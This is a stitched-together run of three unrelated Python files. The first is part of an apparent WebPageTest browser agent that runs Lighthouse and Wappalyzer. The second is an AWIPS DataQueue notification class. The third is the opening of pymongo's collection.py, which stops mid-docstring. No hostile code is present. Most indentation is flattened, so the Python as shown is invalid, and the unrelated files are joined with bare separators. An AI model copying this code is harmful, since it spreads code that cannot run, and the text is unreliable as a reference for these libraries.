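                # Keep only the name=value pair before the first ';'; cookie attributes
                # such as Path or Expires are dropped.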
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
name = cookie[:pos].strip()
value = cookie[pos + 1:].strip()
if len(name) and len(value) and len(url):
self.devtools.send_command('Network.setCookie',
{'url': url, 'name': name, 'value': value})
elif command['command'] == 'setlocation':
try:
if 'target' in command and command['target'].find(',') > 0:
accuracy = 0
if 'value' in command and re.match(r'\d+', command['value']):
accuracy = int(re.search(r'\d+', str(command['value'])).group())
parts = command['target'].split(',')
lat = float(parts[0])
lng = float(parts[1])
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': accuracy})
except Exception:
logging.exception('Error setting location')
elif command['command'] == 'addheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'setheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'resetheaders':
self.devtools.reset_headers()
elif command['command'] == 'clearcache':
self.devtools.clear_cache()
elif command['command'] == 'disablecache':
disable_cache = bool('target' in command and \
int(re.search(r'\d+',
str(command['target'])).group()) == 1)
self.devtools.disable_cache(disable_cache)
def navigate(self, url):
"""Navigate to the given URL"""
if self.devtools is not None:
self.devtools.send_command('Page.navigate', {'url': url}, wait=True)
def get_requests(self):
"""Get the request details for running an optimization check"""
requests = None
if self.devtools is not None:
requests = self.devtools.get_requests()
return requests
def lighthouse_thread(self):
"""Run lighthouse in a thread so we can kill it if it times out"""
cmd = self.lighthouse_command
self.task['lighthouse_log'] = cmd + "\n"
logging.debug(cmd)
proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE)
for line in iter(proc.stderr.readline, b''):
try:
                line = unicode(line, errors='ignore')
logging.debug(line.rstrip())
self.task['lighthouse_log'] += line
except Exception:
logging.exception('Error recording lighthouse log line %s', line.rstrip())
proc.communicate()
def run_lighthouse_test(self, task):
"""Run a lighthouse test against the current browser session"""
task['lighthouse_log'] = ''
if 'url' in self.job and self.job['url'] is not None:
self.job['shaper'].configure(self.job, task)
output_path = os.path.join(task['dir'], 'lighthouse.json')
json_file = os.path.join(task['dir'], 'lighthouse.report.json')
json_gzip = os.path.join(task['dir'], 'lighthouse.json.gz')
html_file = os.path.join(task['dir'], 'lighthouse.report.html')
html_gzip = os.path.join(task['dir'], 'lighthouse.html.gz')
time_limit = min(int(task['time_limit']), 80)
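            # Cap Lighthouse's max page-load wait at 80 seconds regardless of the overall test time limit.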
command = ['lighthouse',
'"{0}"'.format(self.job['url']),
'--channel', 'wpt',
'--disable-network-throttling',
'--disable-cpu-throttling',
'--throttling-method', 'provided',
'--enable-error-reporting',
'--max-wait-for-load', str(int(time_limit * 1000)),
'--port', str(task['port']),
'--output', 'html',
'--output', 'json',
'--output-path', '"{0}"'.format(output_path)]
if self.job['keep_lighthouse_trace']:
command.append('--save-assets')
if not self.job['keep_lighthouse_screenshots']:
command.extend(['--skip-audits', 'screenshot-thumbnails'])
if self.options.android or 'mobile' not in self.job or not self.job['mobile']:
command.extend(['--emulated-form-factor', 'none'])
if 'user_agent_string' in self.job:
sanitized_user_agent = re.sub(r'[^a-zA-Z0-9_\-.;:/()\[\] ]+', '', self.job['user_agent_string'])
command.append('--chrome-flags="--user-agent=\'{0}\'"'.format(sanitized_user_agent))
if len(task['block']):
for pattern in task['block']:
pattern = "'" + pattern.replace("'", "'\\''") + "'"
command.extend(['--blocked-url-patterns', pattern])
if 'headers' in task:
try:
headers_file = os.path.join(task['dir'], 'lighthouse-headers.json')
with open(headers_file, 'wt') as f_out:
json.dump(task['headers'], f_out)
command.extend(['--extra-headers', '"{0}"'.format(headers_file)])
except Exception:
logging.exception('Error adding custom headers for lighthouse test')
cmd = ' '.join(command)
self.lighthouse_command = cmd
# Give lighthouse up to 10 minutes to run all of the audits
try:
lh_thread = threading.Thread(target=self.lighthouse_thread)
lh_thread.start()
lh_thread.join(600)
except Exception:
logging.exception('Error running lighthouse audits')
from .os_util import kill_all
kill_all('node', True)
self.job['shaper'].reset()
# Rename and compress the trace file, delete the other assets
if self.job['keep_lighthouse_trace']:
try:
lh_trace_src = os.path.join(task['dir'], 'lighthouse-0.trace.json')
if os.path.isfile(lh_trace_src):
# read the JSON in and re-write it line by line to match the other traces
with io.open(lh_trace_src, 'r', encoding='utf-8') as f_in:
trace = json.load(f_in)
if trace is not None and 'traceEvents' in trace:
lighthouse_trace = os.path.join(task['dir'],
'lighthouse_trace.json.gz')
with gzip.open(lighthouse_trace, GZIP_TEXT, 7) as f_out:
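                                # Write a dummy empty event first so every real event can be prefixed with a comma.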
f_out.write('{"traceEvents":[{}')
for trace_event in trace['traceEvents']:
f_out.write(",\n")
f_out.write(json.dumps(trace_event))
f_out.write("\n]}")
except Exception:
logging.exception('Error processing lighthouse trace')
# Delete all the left-over lighthouse assets
files = glob.glob(os.path.join(task['dir'], 'lighthouse-*'))
for file_path in files:
try:
os.remove(file_path)
except Exception:
pass
if os.path.isfile(json_file):
lh_report = None
with io.open(json_file, 'r', encoding='utf-8') as f_in:
lh_report = json.load(f_in)
with open(json_file, 'rb') as f_in:
with gzip.open(json_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(json_file)
except Exception:
pass
# Extract the audit scores
if lh_report is not None:
audits = {}
# v1.x
if 'aggregations' in lh_report:
for entry in lh_report['aggregations']:
if 'name' in entry and 'total' in entry and \
'scored' in entry and entry['scored']:
name = entry['name'].replace(' ', '')
audits[name] = entry['total']
# v2.x
elif 'reportCategories' in lh_report:
for category in lh_report['reportCategories']:
if 'name' in category and 'score' in category:
category_name = category['name'].replace(' ', '')
score = float(category['score']) / 100.0
audits[category_name] = score
if category['name'] == 'Performance' and 'audits' in category:
for audit in category['audits']:
if 'id' in audit and 'group' in audit and \
audit['group'] == 'perf-metric' and \
'result' in audit and \
'rawValue' in audit['result']:
name = category_name + '.' + \
audit['id'].replace(' ', '')
audits[name] = audit['result']['rawValue']
# v3.x
elif 'categories' in lh_report:
for categoryId in lh_report['categories']:
category = lh_report['categories'][categoryId]
if 'title' not in category or 'score' not in category:
continue
category_title = category['title'].replace(' ', '')
audits[category_title] = category['score']
if categoryId != 'performance' or 'auditRefs' not in category:
continue
for auditRef in category['auditRefs']:
if auditRef['id'] not in lh_report['audits']:
continue
if 'group' not in auditRef or auditRef['group'] != 'metrics':
continue
audit = lh_report['audits'][auditRef['id']]
name = category_title + '.' + audit['id']
if 'rawValue' in audit:
audits[name] = audit['rawValue']
elif 'numericValue' in audit:
audits[name] = audit['numericValue']
audits_gzip = os.path.join(task['dir'], 'lighthouse_audits.json.gz')
with gzip.open(audits_gzip, GZIP_TEXT, 7) as f_out:
json.dump(audits, f_out)
# Compress the HTML lighthouse report
if os.path.isfile(html_file):
try:
with open(html_file, 'rb') as f_in:
with gzip.open(html_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(html_file)
except Exception:
logging.exception('Error compressing lighthouse report')
def wappalyzer_detect(self, task, request_headers):
"""Run the wappalyzer detection"""
# Run the Wappalyzer detection (give it 30 seconds at most)
completed = False
if self.devtools is not None:
try:
logging.debug('wappalyzer_detect')
detect_script = self.wappalyzer_script(request_headers)
response = self.devtools.send_command("Runtime.evaluate",
{'expression': detect_script,
'awaitPromise': True,
'returnByValue': True,
'timeout': 30000},
wait=True, timeout=30)
if response is not None and 'result' in response and\
'result' in response['result'] and\
'value' in response['result']['result']:
result = response['result']['result']['value']
if result:
completed = True
logging.debug(result)
detected = json.loads(result)
if 'categories' in detected:
task['page_data']['detected'] = dict(detected['categories'])
if 'apps' in detected:
task['page_data']['detected_apps'] = dict(detected['apps'])
except Exception as err:
logging.exception("Exception running Wappalyzer: %s", err.__str__())
if not completed:
task['page_data']['wappalyzer_failed'] = 1
def wappalyzer_script(self, response_headers):
"""Build the wappalyzer script to run in-browser"""
script = None
try:
with open(os.path.join(self.support_path, 'Wappalyzer', 'script.js')) as f_in:
script = f_in.read()
if script is not None:
wappalyzer = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'wappalyzer.js')) as f_in:
wappalyzer = f_in.read()
if wappalyzer is not None:
json_data = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'apps.json')) as f_in:
json_data = f_in.read()
                    if json_data is not None:
# Format the headers as a dictionary of lists
headers = {}
if response_headers is not None:
if isinstance(response_headers, dict):
for key in response_headers:
values = []
entry = response_headers[key]
if isinstance(entry, list):
values = entry
elif isinstance(entry, (str, unicode)):
entries = entry.split('\n')
for value in entries:
values.append(value.strip())
if values:
headers[key.lower()] = values
elif isinstance(response_headers, list):
for pair in response_headers:
if isinstance(pair, (str, unicode)):
parts = pair.split(':', 1)
key = parts[0].strip(' :\n\t').lower()
value = parts[1].strip(' :\n\t')
if key not in headers:
headers[key] = []
headers[key].append(value)
script = script.replace('%WAPPALYZER%', wappalyzer)
script = script.replace('%JSON%', json_data)
script = script.replace('%RESPONSE_HEADERS%', json.dumps(headers))
except Exception:
logging.exception('Error building wappalyzer script')
return script
|
DataQueue.py
|
#
# Convenience class for using the DAF's notifications feature. This is a
# collection that, once connected to EDEX by calling start(), fills with
# data as notifications come in. Runs on a separate thread to allow
# non-blocking data retrieval.
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/29/16 2416 tgurney Initial creation
#
from awips.dataaccess import DataNotificationLayer as DNL
import time
from threading import Thread
import sys
if sys.version_info.major == 2:
from Queue import Queue, Empty
else: # Python 3 module renamed to 'queue'
from queue import Queue, Empty
# Used to indicate a DataQueue that will produce geometry data.
GEOMETRY = object()
# Used to indicate a DataQueue that will produce grid data.
GRID = object()
# Default maximum queue size.
_DEFAULT_MAXSIZE = 100
class Closed(Exception):
"""Raised when attempting to get data from a closed queue."""
pass
class DataQueue(object):
"""
Convenience class for using the DAF's notifications feature. This is a
collection that, once connected to EDEX by calling start(), fills with
data as notifications come in.
Example for getting obs data:
from DataQueue import DataQueue, GEOMETRY
request = DataAccessLayer.newDataRequest('obs')
request.setParameters('temperature')
request.setLocationNames('KOMA')
q = DataQueue(GEOMETRY, request)
q.start()
for item in q:
print(item.getNumber('temperature'))
"""
def __init__(self, dtype, request, maxsize=_DEFAULT_MAXSIZE):
"""
Create a new DataQueue.
Args:
dtype: Either GRID or GEOMETRY; must match the type of data
requested.
request: IDataRequest describing the data you want. It must at
least have datatype set. All data produced will satisfy the
constraints you specify.
maxsize: Maximum number of data objects the queue can hold at
one time. If the limit is reached, any data coming in after
that will not appear until one or more items are removed using
DataQueue.get().
"""
assert maxsize > 0
assert dtype in (GEOMETRY, GRID)
self._maxsize = maxsize
self._queue = Queue(maxsize=maxsize)
self._thread = None
if dtype is GEOMETRY:
self._notifier = DNL.getGeometryDataUpdates(request)
elif dtype is GRID:
self._notifier = DNL.getGridDataUpdates(request)
def start(self):
"""Start listening for notifications and requesting data."""
if self._thread is not None:
# Already started
return
kwargs = {'callback': self._data_received}
self._thread = Thread(target=self._notifier.subscribe, kwargs=kwargs)
self._thread.daemon = True
self._thread.start()
timer = 0
while not self._notifier.subscribed:
time.sleep(0.1)
timer += 1
if timer >= 100: # ten seconds
raise RuntimeError('timed out when attempting to subscribe')
def _data_received(self, data):
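        # A notification may carry a single item or a list of items; flatten so the
        # queue always holds individual IData objects.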
for d in data:
if not isinstance(d, list):
d = [d]
for item in d:
self._queue.put(item)
def get(self, block=True, timeout=None):
"""
Get and return the next available data object. By default, if there is
no data yet available, this method will not return until data becomes
available.
Args:
block: Specifies behavior when the queue is empty. If True, wait
until an item is available before returning (the default). If
False, return None immediately if the queue is empty.
timeout: If block is True, wait this many seconds, and return None
if data is not received in that time.
Returns:
IData
"""
if self.closed:
raise Closed
try:
return self._queue.get(block, timeout)
except Empty:
return None
def get_all(self):
"""
Get all data waiting for processing, in a single list. Always returns
immediately. Returns an empty list if no data has arrived yet.
Returns:
List of IData
"""
data = []
for _ in range(self._maxsize):
next_item = self.get(False)
if next_item is None:
break
data.append(next_item)
return data
def close(self):
"""Close the queue. May not be re-opened after closing."""
if not self.closed:
self._notifier.close()
self._thread.join()
def qsize(self):
"""Return number of items in the queue."""
return self._queue.qsize()
def empty(self):
"""Return True if the queue is empty."""
return self._queue.empty()
def full(self):
"""Return True if the queue is full."""
return self._queue.full()
@property
def closed(self):
"""True if the queue has been closed."""
return not self._notifier.subscribed
@property
def maxsize(self):
"""
Maximum number of data objects the queue can hold at one time.
If this limit is reached, any data coming in after that will not appear
until one or more items are removed using get().
"""
return self._maxsize
def __iter__(self):
if self._thread is not None:
while not self.closed:
yield self.get()
def __enter__(self):
self.start()
return self
def __exit__(self, *unused):
self.close()
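# --- Illustrative usage sketch (not part of the original module) ---
# Shows the context-manager form enabled by __enter__/__exit__ above, which starts
# the queue on entry and closes it on exit. The datatype, parameter, and station
# ('obs', 'temperature', 'KOMA') mirror the class docstring and are assumptions
# about the connected EDEX server, not guarantees.
if __name__ == '__main__':
    from awips.dataaccess import DataAccessLayer
    request = DataAccessLayer.newDataRequest('obs')
    request.setParameters('temperature')
    request.setLocationNames('KOMA')
    with DataQueue(GEOMETRY, request) as q:
        # Drain whatever has arrived so far without blocking.
        for item in q.get_all():
            print(item.getNumber('temperature'))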
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
        command; it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count({'x': 1})
0
